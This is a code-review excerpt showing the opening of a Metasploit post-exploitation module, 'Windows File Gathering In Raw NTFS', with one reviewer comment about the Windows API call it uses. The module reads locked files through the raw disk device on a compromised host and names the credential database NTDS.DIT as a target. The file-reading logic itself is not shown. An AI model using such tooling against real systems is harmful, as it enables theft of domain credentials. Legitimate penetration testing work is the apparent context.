modules/post/windows/gather/file_in_raw_ntfs.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::Windows::Priv
+  require "rex/parser/fs/ntfs"
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Windows File Gathering In Raw NTFS',
+      'Description'  => %q{
+          This module gather file using the raw NTFS device, bypassing some Windows restriction.
+          Gather file from disk bypassing restriction like already open file with write right lock.
+          Can be used to retreive file like NTDS.DIT
+      },
+      'License'      => 'MSF_LICENSE',
+      'Platform'     => ['win'],
+      'SessionTypes' => ['meterpreter'],
+      'Author'       => ['Danil Bazin <danil.bazin[at]hsc.fr>'], #@danilbaz
+      'References'   => [
+        [ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ]
+      ]
+    ))
+    register_options(
+      [
+        OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil])
+      ], self.class)
+  end
+
+  def run
+    winver = sysinfo["OS"]
+
+    if winver =~ /2000/i
+      print_error("Module not valid for Windows 2000")
+      return
+    end
+
+    unless is_admin?
+      print_error("You don't have enough privileges")
+      return
+    end
+
+    file_path = datastore['FILE_PATH']
+
+    r = client.railgun.kernel32.GetFileAttributesA(file_path)
```

Comment:
Would this call be better as GetFileAttributesW to support non-English operating systems?